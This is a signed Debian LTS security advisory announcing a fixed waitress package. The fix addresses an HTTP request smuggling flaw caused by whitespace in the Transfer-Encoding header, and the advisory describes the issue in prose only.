-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Package : waitress Version : 0.8.9-2+deb8u1 Debian Bug : #765126
It was discovered that there was a HTTP request smuggling vulnerability in waitress, pure-Python WSGI server. If a proxy server is used in front of waitress, an invalid request may be sent by an attacker that bypasses the front-end and is parsed differently by waitress leading to a potential for request smuggling. Specially crafted requests containing special whitespace characters in the Transfer-Encoding header would get parsed by Waitress as being a chunked request, but a front-end server would use the Content-Length instead as the Transfer-Encoding header is considered invalid due to containing invalid characters. If a front-end server does HTTP pipelining to a backend Waitress server this could lead to HTTP request splitting which may lead to potential cache poisoning or information disclosure. For Debian 8 "Jessie", this issue has been fixed in waitress version 0.8.9-2+deb8u1. We recommend that you upgrade your waitress packages. Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS Regards, - -- ,''`. : :' : Chris Lamb `. `'` [email protected] / chris-lamb.co.uk `- -----BEGIN PGP SIGNATURE----- iQIzBAEBCAAdFiEEwv5L0nHBObhsUz5GHpU+J9QxHlgFAl4MpCkACgkQHpU+J9Qx HlgiDBAAqTn8jF9NkZKCSMyMZsW+Wb4DazHGkEmzl1Uf/u9padPzIo5WKYkuFT3F AaLaGou8k9DdMZ3i7e9KSZw31vBcyj7oSVaFKBU/SUklC/V5BB8BMhecd+9fPZw8 sk+j7Nm+0iK+ah///RWpm4oG+CfXPXHqeit74pJt02a1mc0DU2cJcMerKkKmeQc7 aD8PlWeTLDO361sJLR9v/5djyEm9Eo6pP7fc7ueMAoPQjS3xxxwUzLBhOEZnWGek 1LS9cwRG4mzfNN8e8GW7cXKqD373iEKBr9o97M6sxwkC4YXrIAzPMcQHo4oJh+Yp x3rOyxibwJlRpp+gftIjKNGg7SZ3/MFrjtyikLkKz/Q9abLPBrRhLlYSthWVt26b nbd2s9XVMwqcnKBQj90LZGGB2oudKvL0xdkd8q24NLd/7iPSVVF7Oc4x3iHtjiYv udTrhcLg+PYpqYKVa0bxXcO65q0PFZkAR7yQHuwPATPSu9HdhRezDjip9GPBrcMr uOqKpVHGznTTpwDuRDgKd8QaTSnkf1Mn1b/qhOFRqfnnrsLXebZPgqLoMSNzbRRU aDQ+CW/mie1N9WF5389FfKRZh20UmltU1hS29gC2vaeJYzl9Fp5n8WEbFsUnUirY zD5KfhJEg/t9Yr7Mzd0jsrdgwBUDAzfEoc9n58gICPRyQDjhxjc= =a6SU -----END PGP SIGNATURE-----
